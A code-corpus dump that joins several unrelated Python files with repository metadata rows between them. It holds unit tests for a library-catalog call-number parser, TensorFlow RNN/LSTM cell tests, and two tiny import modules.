'J 811 B'), 'j')
self.assertEqual(
sierra_parser.parse_call_audn(
'J B ADAMS W'), 'j')
self.assertEqual(
sierra_parser.parse_call_audn(
'DVD J ANIMATION'), 'j')
self.assertEqual(
sierra_parser.parse_call_audn(
'DVD RUS J ANIMATION'), 'j')
self.assertEqual(
sierra_parser.parse_call_audn(
'DVD SPA J B ADAMS'), 'j')
self.assertEqual(
sierra_parser.parse_call_audn(
'KIT J 909 A'), 'j')
self.assertEqual(
sierra_parser.parse_call_audn(
'AUDIO J FIC ADAMS'), 'j')
self.assertEqual(
sierra_parser.parse_call_audn(
'BOOK & CD J 494 A'), 'j')
self.assertEqual(
sierra_parser.parse_call_audn(
'POL J FIC SCIESZKA'), 'j')
self.assertEqual(
sierra_parser.parse_call_audn(
'DVD JPN'), 'a')
self.assertEqual(
sierra_parser.parse_call_audn(
'B BAJ-EON C'), 'a')
self.assertEqual(
sierra_parser.parse_call_audn(
'eBOOK'), 'a')
self.assertEqual(
sierra_parser.parse_call_audn(
'811 J'), 'a')
self.assertEqual(
sierra_parser.parse_call_audn(
'B ADAMS J'), 'a')
self.assertEqual(
sierra_parser.parse_call_audn(
'DVD'), 'a')
self.assertEqual(
sierra_parser.parse_call_audn(
'DVD JPN'), 'a')
self.assertEqual(
sierra_parser.parse_call_audn(
'BOOK & CD RUS J 486.76 C'), 'j')
self.assertEqual(
sierra_parser.parse_call_audn(
'BOOK & CD RUS 486.76 C'), 'a')
self.assertEqual(
sierra_parser.parse_call_audn(
'FIC J'), 'a')
self.assertEqual(
sierra_parser.parse_call_audn(
'CD J WORLD JEWISH COLLECTION'), 'j')
self.assertEqual(
sierra_parser.parse_call_audn(
'DVD J FRE'), 'j') # this can cause records with inverted order to miss the QC
self.assertEqual(
sierra_parser.parse_call_audn(
'READALONG J FIC ADAMS'), 'j')
self.assertEqual(
sierra_parser.parse_call_audn(
'READALONG J 811 A'), 'j')
def test_world_language_prefix(self):
self.assertFalse(
sierra_parser.world_lang_prefix(
'DVD OFF'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'DVD OFFICE'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'DVD 909 B'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'DVD B ADAMS A'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'DVD J B ADAMS A'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'DVD CHI OFFICE'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'DVD CHI J B ADAMS B'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'DVD J'))
self.assertFalse(
sierra_parser.world_lang_prefix(
''))
self.assertTrue(
sierra_parser.world_lang_prefix(
'DVD ARA J HOME'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'DVD ARA J 909 A'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'AUDIO RUS FIC ADAMS'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'AUDIO RUS J FIC ADAMS'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'AUDIO J FIC ADAMS'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'AUDIO FIC ADAMS'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'AUDIO CHI 909 A'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'AUDIO FIC ADA'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'AUDIO RUS B ADAMS A'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'KIT RUS 909 A'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'KIT 909 A'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'KIT J 909 A'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'KIT RUS J 909 A'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'KIT 872.8 H'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'BOOK & CD RUS 811 B'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'BOOK & CD RUS J-E'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'BOOK & CD RUS J FIC A'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'BOOK & CD FIC ADA'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'BOOK & CD RUS B ADAMS A'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'BOOK & CD B ADAMS A'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'BOOK & CD 901 A'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'BOOK & CD J-E ADAMS'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'BOOK & DVD RUS 811 B'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'BOOK & DVD RUS J-E'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'BOOK & DVD RUS J FIC A'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'BOOK & DVD FIC ADA'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'BOOK & DVD RUS B ADAMS A'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'BOOK & DVD B ADAMS A'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'BOOK & DVD 901 A'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'BOOK & DVD RUS B ADA B'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'SPA J-E ADAMS'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'SPA FIC ADAMS'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'CHI J FIC ADAMS'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'POL B ADA J'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'RUS 811 B'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'VIDEO CHI'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'FIC ADAMS'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'B ADAMS J'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'J-E ADAMS'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'J-E JARAMILLO'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'J-E'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'FIC F'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'FIC BARTHELME'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'LIB 711.3 B'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'FIC JOHNSTONE'))
self.assertFalse(
sierra_parser.world_lang_prefix(
'READALONG J FIC ADAMS'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'READALONG SPA J FIC ADAMS'))
self.assertTrue(
sierra_parser.world_lang_prefix(
'READALONG SPA J 811 A'))
def test_parse_call_type(self):
self.assertEqual(
sierra_parser.parse_call_type(
'SPA J-E ADAMS'), 'eas')
self.assertEqual(
sierra_parser.parse_call_type(
'J-E JARAMILLO'), 'eas')
self.assertEqual(
sierra_parser.parse_call_type(
'J-E ADAMS'), 'eas')
self.assertEqual(
sierra_parser.parse_call_type(
'J-E'), 'eas')
self.assertEqual(
sierra_parser.parse_call_type(
'KIT J-E ADAMS'), 'eas')
self.assertEqual(
sierra_parser.parse_call_type(
'FIC ADAMS'), 'fic')
self.assertEqual(
sierra_parser.parse_call_type(
'FIC B'), 'fic')
self.assertEqual(
sierra_parser.parse_call_type(
'POL J FIC ADAMS'), 'fic')
self.assertEqual(
sierra_parser.parse_call_type(
'FIC ADAMS'), 'fic')
self.assertEqual(
sierra_parser.parse_call_type(
'B ADAMS A'), 'bio')
self.assertEqual(
sierra_parser.parse_call_type(
'B ADA-BAD A'), 'bio')
self.assertEqual(
sierra_parser.parse_call_type(
'RUS B G\'OGOL A'), 'bio')
self.assertEqual(
sierra_parser.parse_call_type(
'DVD B ADAMS A'), 'bio')
self.assertEqual(
sierra_parser.parse_call_type(
'811 POE B'), 'des')
self.assertEqual(
sierra_parser.parse_call_type(
'641.5 ROB R'), 'des') # this is incorrect call number
self.assertEqual(
sierra_parser.parse_call_type(
'762.6535 BOWIE B'), 'des')
self.assertEqual(
sierra_parser.parse_call_type(
'DVD 762.6535 BOWIE B'), 'des')
self.assertEqual(
sierra_parser.parse_call_type(
'005.133 SWIFT S'), 'des')
self.assertEqual(
sierra_parser.parse_call_type(
'004.1675 IPAD H'), 'des')
self.assertEqual(
sierra_parser.parse_call_type(
'818 P'), 'dew')
self.assertEqual(
sierra_parser.parse_call_type(
'909.765 P'), 'dew')
self.assertEqual(
sierra_parser.parse_call_type(
'822.33 S52 Q'), 'des')
# older call number pattern
self.assertEqual(
sierra_parser.parse_call_type(
'929.2 H241 B2'), 'des')
self.assertIsNone(
sierra_parser.parse_call_type(
'DVD'))
self.assertEqual(
sierra_parser.parse_call_type(
'DVD J'), 'fea')
self.assertEqual(
sierra_parser.parse_call_type(
'DVD SPA'), 'fea')
self.assertEqual(
sierra_parser.parse_call_type(
'DVD SPA J'), 'fea')
self.assertEqual(
sierra_parser.parse_call_type(
'MIFI DEVICE'), 'mif')
self.assertEqual(
sierra_parser.parse_call_type(
'eBOOK'), 'ere')
self.assertEqual(
sierra_parser.parse_call_type(
'CD WORLD JEWISH SHWEKEY'), 'cdm')
self.assertEqual(
sierra_parser.parse_call_type(
'BOOK & CD 468.3421 B'), 'dew')
self.assertEqual(
sierra_parser.parse_call_type(
'BOOK & CD 811 WHITMAN K'), 'des')
self.assertEqual(
sierra_parser.parse_call_type(
'BOOK & CD ARA 428.34927 L'), 'dew')
self.assertEqual(
sierra_parser.parse_call_type(
'BOOK & CD J B ADAMS A'), 'bio')
self.assertEqual(
sierra_parser.parse_call_type(
'AUDIO 225.5208 B582 W'), 'des')
self.assertEqual(
sierra_parser.parse_call_type(
'AUDIO 782.1 WAGNER S'), 'des')
self.assertEqual(
sierra_parser.parse_call_type(
'AUDIO SPA FIC COELHO'), 'fic')
self.assertEqual(
sierra_parser.parse_call_type(
'AUDIO SPA B CRUZ M'), 'bio')
self.assertEqual(
sierra_parser.parse_call_type(
'AUDIO SPA J FIC SAINT-EXUPERY'), 'fic')
self.assertIsNone(
sierra_parser.parse_call_type(
'RUS TROTSKY Z'))
self.assertEqual(
sierra_parser.parse_call_type(
'READALONG J FIC ADAMS'), 'fic')
self.assertEqual(
sierra_parser.parse_call_type(
'READALONG J 811 A'), 'dew')
def test_parse_call_cutter(self):
self.assertTrue(
sierra_parser.parse_call_cutter(
'SPA J-E ADAMS'))
self.assertFalse(
sierra_parser.parse_call_cutter(
'J-E'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'J B ADAMS J'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'BOOK & CD 987 J'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'AUDIO FIC ADAMS'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'CD FOLK COHEN'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'WEB SITE 909 B'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'909 B'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'RUS 811 POE B'))
self.assertFalse(
sierra_parser.parse_call_cutter(
'SPA J-E'))
self.assertFalse(
sierra_parser.parse_call_cutter(
'J FIC'))
self.assertFalse(
sierra_parser.parse_call_cutter(
'FIC'))
self.assertFalse(
sierra_parser.parse_call_cutter(
'J B'))
self.assertFalse(
sierra_parser.parse_call_cutter(
'DVD RUS'))
self.assertFalse(
sierra_parser.parse_call_cutter(
'DVD J'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'DVD RUS 909 B'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'DVD J 919 D'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'DVD J 919.34')) # incorrect, should be False but more work to distinguish from DVD 1917 for example
self.assertTrue(
sierra_parser.parse_call_cutter(
'DVD HARRY'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'DVD RUS HARRY'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'DVD FRE FAMILLE'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'DVD FRE J STELLA'))
self.assertFalse(
sierra_parser.parse_call_cutter(
'909'))
self.assertFalse(
sierra_parser.parse_call_cutter(
'MIFI DEVICE'))
self.assertFalse(
sierra_parser.parse_call_cutter(
'eBOOK'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'658.058 D598'))
self.assertFalse(
sierra_parser.parse_call_cutter(
'823.33 S52'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'823.33 S52 A B'))
self.assertFalse(
sierra_parser.parse_call_cutter(
'226.607 B582'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'226.607 B582 C'))
self.assertFalse(
sierra_parser.parse_call_cutter(
'AUDIO 226.607'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'AUDIO 226.607 C'))
self.assertFalse(
sierra_parser.parse_call_cutter(
'FIC 1'))
# very unlikely sanborn cutters will be pick up
self.assertTrue(
sierra_parser.parse_call_cutter(
'973 A211'))
# extra white space in the call number
self.assertTrue(
sierra_parser.parse_call_cutter(
'J-E BUSSE'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'READALONG J FIC ADAMS'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'READALONG J 811 A'))
self.assertFalse(
sierra_parser.parse_call_cutter(
'READALONG J FIC'))
self.assertFalse(
sierra_parser.parse_call_cutter(
'READALONG SPA J FIC'))
self.assertTrue(
sierra_parser.parse_call_cutter(
'READALONG SPA J FIC ADAMS'))
def test_parse_dewey(self):
self.assertEqual(
sierra_parser.parse_call_dewey(
'909 B'), '909')
self.assertEqual(
sierra_parser.parse_call_dewey(
'J 909.993 B'), '909.993')
self.assertEqual(
sierra_parser.parse_call_dewey(
'DVD 909.76 B'), '909.76')
self.assertEqual(
sierra_parser.parse_call_dewey(
'004.54 PYTHON B'), '004.54')
self.assertEqual(
sierra_parser.parse_call_dewey(
'220.52 B582 C'), '220.52')
self.assertIsNone(
sierra_parser.parse_call_dewey(
'FIC ADAMS'))
self.assertIsNone(
sierra_parser.parse_call_dewey(
'J B ADAMS C'))
self.assertIsNone(
sierra_parser.parse_call_dewey(
'DVD RUS'))
self.assertIsNone(
sierra_parser.parse_call_dewey(
'J-E ADAMS'))
self.assertIsNone(
sierra_parser.parse_call_dewey(
'READALONG J FIC ADAMS'))
self.assertEqual(
sierra_parser.parse_call_dewey(
'READALONG J 945.2 A'), '945.2')
def test_identify_dewey_range(self):
self.assertEqual(
sierra_parser.identify_dewey_range(
'060 E'), 'll')
self.assertEqual(
sierra_parser.identify_dewey_range(
'001.9 E'), 'll')
self.assertEqual(
sierra_parser.identify_dewey_range(
'428.4 S'), 'll')
self.assertEqual(
sierra_parser.identify_dewey_range(
'028.9 S'), 'll')
self.assertEqual(
sierra_parser.identify_dewey_range(
'811 S'), 'll')
self.assertEqual(
sierra_parser.identify_dewey_range(
'028.9 S'), 'll')
self.assertEqual(
sierra_parser.identify_dewey_range(
'070.92 S'), 'll')
self.assertEqual(
sierra_parser.identify_dewey_range(
'004.165 RASPBERRY PI R'), 'ss')
self.assertEqual(
sierra_parser.identify_dewey_range(
'190 B'), 'ss')
self.assertEqual(
sierra_parser.identify_dewey_range(
'341.02 D'), 'ss')
self.assertEqual(
sierra_parser.identify_dewey_range(
'509 D'), 'ss')
self.assertEqual(
sierra_parser.identify_dewey_range(
'641.72 D'), 'ss')
self.assertEqual(
sierra_parser.identify_dewey_range(
'208.23 D'), 'hb')
self.assertEqual(
sierra_parser.identify_dewey_range(
'900 D'), 'hb')
self.assertEqual(
sierra_parser.identify_dewey_range(
'391 D'), 'ar')
self.assertEqual(
sierra_parser.identify_dewey_range(
'711 D'), 'ar')
self.assertEqual(
sierra_parser.identify_dewey_range(
'294.3927 H'), 'hb')
def test_parse_ord_audn(self):
self.assertEqual(
sierra_parser.parse_ord_audn(
'awl'), 'a')
self.assertEqual(
sierra_parser.parse_ord_audn(
'ynf'), 'y')
self.assertEqual(
sierra_parser.parse_ord_audn(
'jje'), 'j')
self.assertIsNone(
sierra_parser.parse_ord_audn(
''))
self.assertEqual(
sierra_parser.parse_ord_audn(
'nac'), 'a')
self.assertEqual(
sierra_parser.parse_ord_audn(
'tab'), 'a')
self.assertEqual(
sierra_parser.parse_ord_audn(
'tcp'), 'j')
self.assertEqual(
sierra_parser.parse_ord_audn(
'mfi'), 'a')
self.assertIsNone(
sierra_parser.parse_ord_audn(
''))
self.assertEqual(
sierra_parser.parse_ord_audn(
'jra'), 'j')
def test_parsing_of_row_of_sierra_report(self):
"""fuctional tests of sierra report parser"""
reader = sierra_parser.report_data('report_test.txt', 180)
for record in reader:
bib_keys = [x for x in record[0]]
ord_keys = [x for x in record[1]]
self.assertEqual(bib_keys, [
'c_format', 'c_dewey', 'b_date', 'c_wl', 'c_audn', 'id',
'c_type', 'author', 'title', 'subject_person', 'c_cutter',
'subjects', 'c_division', 'b_type', 'crit_work', 'b_call'])
self.assertEqual(ord_keys, [
'bid', 'o_branch', 'copies', 'o_date', 'o_audn',
'o_shelf', 'ven_note', 'id'])
if __name__ == '__main__':
unittest.main()
| 35.820598
| 213
| 0.530854
| 3,319
| 32,346
| 4.904188
| 0.128352
| 0.205689
| 0.195306
| 0.243841
| 0.827671
| 0.817473
| 0.771825
| 0.590834
| 0.432451
| 0.255575
| 0
| 0.03109
| 0.371545
| 32,346
| 902
| 214
| 35.86031
| 0.769628
| 0.016138
| 0
| 0.656682
| 0
| 0.002304
| 0.142969
| 0.003018
| 0
| 0
| 0
| 0
| 0.321429
| 1
| 0.021889
| false
| 0
| 0.003456
| 0
| 0.026498
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0a1d9e9786e840bb30d3220dc7c0850535a579c8
| 8,084
|
py
|
Python
|
playground/test_rnn.py
|
stevenchen521/quant_ml
|
f7d5efc49c934724f97fcafacc560f4a35b24551
|
[
"MIT"
] | 5
|
2019-02-14T03:12:22.000Z
|
2022-01-24T18:43:07.000Z
|
playground/test_rnn.py
|
stevenchen521/quant_ml
|
f7d5efc49c934724f97fcafacc560f4a35b24551
|
[
"MIT"
] | null | null | null |
playground/test_rnn.py
|
stevenchen521/quant_ml
|
f7d5efc49c934724f97fcafacc560f4a35b24551
|
[
"MIT"
] | 2
|
2019-11-13T18:56:13.000Z
|
2021-12-31T01:25:22.000Z
|
import unittest
import tensorflow as tf
from .rnn_enh import MultiInputLSTMCell
from tensorflow.python.framework.tensor_shape import TensorShape
import numpy as np
import os
from helper.util import get_logger
class RNNTestCase(unittest.TestCase):
LOG_DIR = './logs'
def setUp(self):
self.LOGGER = get_logger(__name__)
def test_basic_rnn_cell(self):
self.LOGGER.info(self._testMethodName)
cell = tf.nn.rnn_cell.BasicRNNCell(num_units=128) # state_size = 128
self.LOGGER.info(cell.state_size) # 128
inputs = tf.placeholder(np.float32, shape=(32, 100)) # 32 是 batch_size
h0 = cell.zero_state(32, np.float32) # 通过zero_state得到一个全0的初始状态,形状为(batch_size, state_size)
output, h1 = cell.__call__(inputs, h0) # 调用call函数
self.LOGGER.info(h1.shape) # (32, 128)
def test_basic_rnn_cell2(self):
self.LOGGER.info(self._testMethodName)
cell = tf.nn.rnn_cell.BasicRNNCell(num_units=128, dtype='float32') # state_size = 128
self.LOGGER.info(cell.state_size) # 128
inputs = tf.placeholder(np.float32, shape=(32, 100)) # 32 是 batch_size
cell.build(inputs_shape=inputs.shape)
h0 = cell.zero_state(32, np.float32) # 通过zero_state得到一个全0的初始状态,形状为(batch_size, state_size)
output, h1 = cell.call(inputs, h0) #调用cal
self.LOGGER.info(h1.shape)# (32, 128)
def test_basic_lstm_cell(self):
self.LOGGER.info(self._testMethodName)
lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(num_units=128)
inputs = tf.placeholder(np.float32, shape=(32, 100)) # 32 是 batch_size
h0 = lstm_cell.zero_state(32, np.float32) # 通过zero_state得到一个全0的初始状态
output, h1 = lstm_cell.__call__(inputs, h0)
self.LOGGER.info(h1.h) # shape=(32, 128)
self.LOGGER.info(h1.c) # shape=(32, 128)
def test_multi_rnn_cell(self):
self.LOGGER.info(self._testMethodName)
# 每调用一次这个函数就返回一个BasicRNNCell
def get_a_cell():
return tf.nn.rnn_cell.BasicRNNCell(num_units=128)
# 用tf.nn.rnn_cell MultiRNNCell创建3层RNN
cell = tf.nn.rnn_cell.MultiRNNCell([get_a_cell() for _ in range(3)]) # 3层RNN
# 得到的cell实际也是RNNCell的子类
# 它的state_size是(128, 128, 128)
# (128, 128, 128)并不是128x128x128的意思
# 而是表示共有3个隐层状态,每个隐层状态的大小为128
self.LOGGER.info(cell.state_size) # (128, 128, 128)
# 使用对应的call函数
inputs = tf.placeholder(np.float32, shape=(32, 100)) # 32 是 batch_size
h0 = cell.zero_state(32, np.float32) # 通过zero_state得到一个全0的初始状态
output, h1 = cell.call(inputs, h0)
self.LOGGER.info(h1) # tuple中含有3个32x128的向量
# sess = tf.Session()
# self.LOGGER.info(sess.run())
def test_dynamic_rnn(self):
self.LOGGER.info(self._testMethodName)
# 每调用一次这个函数就返回一个BasicRNNCell
def get_a_cell():
return tf.nn.rnn_cell.BasicRNNCell(num_units=128)
# 用tf.nn.rnn_cell MultiRNNCell创建3层RNN
cell = tf.nn.rnn_cell.MultiRNNCell([get_a_cell() for _ in range(3)]) # 3层RNN
# 得到的cell实际也是RNNCell的子类
# 它的state_size是(128, 128, 128)
# (128, 128, 128)并不是128x128x128的意思
# 而是表示共有3个隐层状态,每个隐层状态的大小为128
# self.LOGGER.info(cell.state_size) # (128, 128, 128)
# 使用对应的call函数
inputs = tf.placeholder(np.float32, shape=(32,10, 100)) # 32 是 batch_size
h0 = cell.zero_state(32, np.float32) # 通过zero_state得到一个全0的初始状态
outputs, state = tf.nn.dynamic_rnn(cell, inputs, initial_state=h0)
tf.global_variables_initializer()
# sess = tf.Session()
# self.LOGGER.info(sess.run())
def test_drnn_with_session(self):
self.LOGGER.info(self._testMethodName)
module_name = 'test_drnn_with_session'
writer = tf.summary.FileWriter(os.path.join(self.LOG_DIR, module_name))
# 每调用一次这个函数就返回一个BasicRNNCell
def get_a_cell():
return tf.nn.rnn_cell.BasicLSTMCell(num_units=128)
with tf.variable_scope("MultiRNNCell"):
# 用tf.nn.rnn_cell MultiRNNCell创建3层RNN
cell = tf.nn.rnn_cell.MultiRNNCell([get_a_cell() for _ in range(3)]) # 3层RNN
h0 = cell.zero_state(32, np.float32) # 通过zero_state得到一个全0的初始状态
# 得到的cell实际也是RNNCell的子类
# 它的state_size是(128, 128, 128)
# (128, 128, 128)并不是128x128x128的意思
# 而是表示共有3个隐层状态,每个隐层状态的大小为128
# self.LOGGER.info(cell.state_size) # (128, 128, 128)
# 使用对应的call函数
with tf.variable_scope("inputs"):
inputs = tf.placeholder(np.float32, shape=(32, 10, 100)) # 32 是 batch_size
with tf.variable_scope("dynamic_rnn"):
outputs, state = tf.nn.dynamic_rnn(cell, inputs, initial_state=h0)
# sess = tf.Session()
# self.LOGGER.info(sess.run())
with tf.Session() as sess:
tf.global_variables_initializer().run()
saver = tf.train.Saver()
writer.add_graph(sess.graph)
tf.global_variables_initializer()
train_data_feed = {
inputs: [[[1.15 for k in range(100)] for j in range(10)] for i in range(32)]
}
a = sess.run([inputs], train_data_feed)
saver.save(sess, os.path.join(self.LOG_DIR, module_name))
def test_multi_input_lstm(self):
self.LOGGER.info(self._testMethodName)
cell = MultiInputLSTMCell(num_units=128) # state_size = 128
# self.LOGGER.info(cell.state_size) # 128
cell.build(inputs_shape=TensorShape([32,100]))
self.LOGGER.info(tf.contrib.framework.get_trainable_variables())
def test_mirnn_with_session(self):
self.LOGGER.info(self._testMethodName)
# module_name = 'test_mirnn_with_session'
writer = tf.summary.FileWriter(os.path.join(self.LOG_DIR, self._testMethodName))
# 每调用一次这个函数就返回一个BasicRNNCell
def get_a_cell():
# return MultiInputLSTMCell(num_units=128, memory_slots=2, memory_size=128, keys={"key1":1})
return MultiInputLSTMCell(num_units=128)
with tf.variable_scope("MultiRNNCell"):
#
cell = tf.nn.rnn_cell.MultiRNNCell([get_a_cell() for _ in range(3)]) # 3层RNN
h0 = cell.zero_state(32, np.float32) # 通过zero_state得到一个全0的初始状态
# cell = get_a_cell()
# h0 = cell.zero_state(32, np.float32) # 通过zero_state得到一个全0的初始状态
# 得到的cell实际也是RNNCell的子类
# 它的state_size是(128, 128, 128)
# (128, 128, 128)并不是128x128x128的意思
# 而是表示共有3个隐层状态,每个隐层状态的大小为128
# self.LOGGER.info(cell.state_size) # (128, 128, 128)
# 使用对应的call函数
with tf.variable_scope("inputs"):
inputs = tf.placeholder(np.float32, shape=(32, 10, 100)) # 32 是 batch_size
with tf.variable_scope("dynamic_rnn"):
# outputs, state = tf.nn.dynamic_rnn(cell, inputs, initial_state=h0)
outputs, state = tf.nn.dynamic_rnn(cell, inputs, dtype=float)
# sess = tf.Session()
# self.LOGGER.info(sess.run())
with tf.Session() as sess:
tf.global_variables_initializer().run()
saver = tf.train.Saver()
writer.add_graph(sess.graph)
tf.global_variables_initializer()
train_data_feed = {
inputs: [[[1.15 for k in range(100)] for j in range(10)] for i in range(32)]
}
a = sess.run([inputs], train_data_feed)
saver.save(sess, os.path.join(self.LOG_DIR, self._testMethodName))
self.LOGGER.info(tf.contrib.framework.get_trainable_variables())
def test_tensorflow_basic(self):
self.LOGGER.info(self._testMethodName)
# Create a tensor
c = tf.constant([0 for _ in range(128)])
self.LOGGER.info(c)
# Expand one dimension
e = tf.expand_dims(c, 0)
self.LOGGER.info(e)
# duplicate 32 rows/batch size
t = tf.tile(e, [32, 1])
self.LOGGER.info(t)
if __name__ == '__main__':
unittest.main()
| 34.4
| 104
| 0.631123
| 1,019
| 8,084
| 4.802748
| 0.140334
| 0.063343
| 0.085819
| 0.029424
| 0.842051
| 0.826931
| 0.819575
| 0.803228
| 0.733347
| 0.733347
| 0
| 0.069509
| 0.25433
| 8,084
| 234
| 105
| 34.547009
| 0.742369
| 0.24332
| 0
| 0.568966
| 0
| 0
| 0.016744
| 0.003647
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12069
| false
| 0
| 0.060345
| 0.034483
| 0.232759
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0a2a4779cfd1fbc28d7e5e9d6358df0aad3d721a
| 42
|
py
|
Python
|
goldsberry/sportvu/__init__.py
|
motraor3/py-Goldsberry
|
fe238b07142cff64eda37e402bb003251af13f9b
|
[
"MIT"
] | 268
|
2015-07-28T18:49:06.000Z
|
2022-03-06T03:08:18.000Z
|
goldsberry/sportvu/__init__.py
|
motraor3/py-Goldsberry
|
fe238b07142cff64eda37e402bb003251af13f9b
|
[
"MIT"
] | 24
|
2015-07-06T22:50:59.000Z
|
2021-07-05T05:10:26.000Z
|
goldsberry/sportvu/__init__.py
|
motraor3/py-Goldsberry
|
fe238b07142cff64eda37e402bb003251af13f9b
|
[
"MIT"
] | 85
|
2015-08-08T17:45:28.000Z
|
2021-11-10T09:35:26.000Z
|
from goldsberry.sportvu._SportVu2 import *
| 42
| 42
| 0.857143
| 5
| 42
| 7
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025641
| 0.071429
| 42
| 1
| 42
| 42
| 0.871795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0a659c5f115b2e705b7c1a1bbdc91ea33857a790
| 169
|
py
|
Python
|
modules/app_email/EmailParser/ost_parser.py
|
naaya17/carpe
|
fa2e3cfebe20f8839c985e5b9b78b538800172a1
|
[
"Apache-2.0"
] | 56
|
2019-02-07T06:21:45.000Z
|
2022-03-21T08:19:24.000Z
|
modules/app_email/EmailParser/ost_parser.py
|
naaya17/carpe
|
fa2e3cfebe20f8839c985e5b9b78b538800172a1
|
[
"Apache-2.0"
] | 5
|
2020-05-25T17:29:00.000Z
|
2021-12-13T20:49:08.000Z
|
modules/app_email/EmailParser/ost_parser.py
|
naaya17/carpe
|
fa2e3cfebe20f8839c985e5b9b78b538800172a1
|
[
"Apache-2.0"
] | 31
|
2019-03-13T10:23:49.000Z
|
2021-11-04T12:14:58.000Z
|
import EmailParser.pst_parser
"""
if __name__ == "__main__":
pass
else:
from EmailBoxClass import EmailBox
EmailBox.main = EmailParser.pst_parser.main
"""
| 16.9
| 47
| 0.715976
| 19
| 169
| 5.842105
| 0.631579
| 0.252252
| 0.36036
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.183432
| 169
| 9
| 48
| 18.777778
| 0.804348
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
